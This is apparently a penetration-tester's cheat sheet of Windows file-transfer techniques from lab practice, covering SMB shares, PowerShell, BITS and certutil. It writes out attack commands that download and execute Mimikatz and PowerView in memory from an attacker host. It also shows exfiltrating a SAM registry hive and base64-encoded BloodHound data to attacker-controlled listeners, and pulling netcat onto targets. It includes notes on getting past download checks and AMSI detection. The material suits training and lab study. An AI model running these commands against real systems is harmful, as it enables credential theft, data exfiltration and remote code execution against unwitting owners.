Windows File Transfer
Smb Server / Mount share
smbserver.py -smb2support -username gust -password guest share /root/htb
#Mount
net use x: \\<IP>\share /user:guest <password>
#Download
cmd /c "copy file.txt X:\"
move sam.save \\10.10.15.16\CompData
$pass = convertto-securestring 'staphy' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('staphy',$pass)
New-PSDrive -Name "staphy" -PSProvider "FileSystem" -Credential $creds -Root "\\<IP>\Public"
cd staphy:
PowerShell
PowerShell Downloads
#System.Net.WebClient class can be used to download a file over HTTP.
(New-Object System.Net.WebClient).DownloadFile('http://<IP>:PORT/file.EXT',"C:\Outfile.EXT")
#From PowerShell 3.0 Invoke-WebRequest but slower,
#Alias iwr, curl, wget can be used instead of Invoke-WebRequest
Invoke-WebRequest -uri http://<IP>:PORT/file.Ext -OutFile file.Ext
#Execute Payload directly into memory using Invoke-Expression
#Alias iex
IEX (New-Object Net-WebClient).DownloadString('http://<IP>:PORT/Invoke-Mimikatz.ps1')
#IEX also accepts pipeline input
Invoke-WebRequest https://<IP>:PORT/Invoke-Mimikatz.ps1 | iex
There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download.
This can be bypassed using the parameter -UseBasicParsing
Invoke-WebRequest https://<ip>/PowerView.ps1 | iex
Invoke-WebRequest : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.
At line:1 char:1
+ Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/P ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException
+ FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
# FIX
Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | iex
Invoke-CheckLocalAdminAccess
ComputerName IsAdmin
------------ -------
localhost False
# with administrative access to the machine, we can disable Internet Explorer’s First Run customization
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main" /f /v DisableFirstRunCustomize /t REG_DWORD /d 2
PowerShell Uploads
#Invoke-WebRequest or Invoke-RestMethod
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'c:/Bloodhound.zip' -Encoding Byte))
Invoke-WebRequest -Uri http://<IP>:433 -Method POST -Body $b64
#after catching 64data with ncat
echo <base64> | base64 -d -w 0 > bloodhound.zip
Bitadmin
Download
#Background Intelligent Transfer Service
#Can download from HTTP sites and SMB shares
bitsadmin /transfer n http://<IP>/nc.exe C:\Temp\nc.exe
#PowerShell also enables interaction with BITS, enables file downloads and uploads, supports credentials, and can use specified proxy servers.
Import-Module bitstransfer;Start-BitsTransfer -Source "http://<IP>/nc.exe" -Destination "C:\Temp\nc.exe"
Upload
start-BitsTransfer "C:\Temp\bloodhound.zip" -Destination "http://10.10.10.132/uploads/bloodhound.zip" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential INLANEFREIGHT\svc-sql
Certutil
#available in all Windows versions
certutil.exe -encode C:\Users\Alfred\Downloads\backups\backup.zip c:\\windows\\temp\backup.b64
type c:\windows\temp #then copy and paste in your machine
vi backup.base64
base64 -d backup.base64 > backup.zip
#the Antimalware Scan Interface (AMSI) currently detects this as malicious certutil usage.
certutil.exe -verifyctl -split -f http://<IP>/nc.exe
Last updated